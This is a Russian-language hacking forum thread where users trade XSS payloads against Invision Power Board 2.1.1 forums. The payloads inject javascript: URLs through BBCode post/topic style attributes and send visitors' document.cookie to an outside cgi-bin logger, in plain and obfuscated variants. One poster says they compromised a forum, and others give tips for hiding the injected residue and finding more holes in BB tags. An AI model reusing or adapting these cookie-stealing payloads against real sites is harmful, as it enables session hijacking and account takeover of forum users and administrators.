|
IPB v2.1.1.
есть ли какие нить способы хакать по мимо загрузки аватаров со скриптами???
Код:
[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ][/topic]] |
PHP код:
|
Код HTML:
[post=1000[topic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ] [/topic]][/post] |
Хм, похожая проблема, взломанный мной форум 2.0.4. прапгрейдели до 2.1.1., никакие вышепредложенные варианты не действуют, са уже перепробвал, никто не может помочь советом?
|
Смотри тут: http://forum.antichat.ru/thread11493.html
И пользуйся поиском по форуму! ЗЫ: В коде, который привел здесь slime в первом сообщении, нужно поудалять звездочки. |
Вот этот попробуй...
[post=1000[topic=target style=background:url(javascript:document.src="http ://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/topic]][/post] у меня на одном форуме прокатило, но остается '> маскируй его цветом |
Звездочки раньше догадался убрать, не действует. Из всех предложенных вариантов ничего не помогает....
Наверное админ самые последние заплатки поставил. |
Скорее всего да, или фильты нужные наваял, но полюбому дыр дофига, изучай, в бб-тегах и до жопы
|
| Время: 03:42 |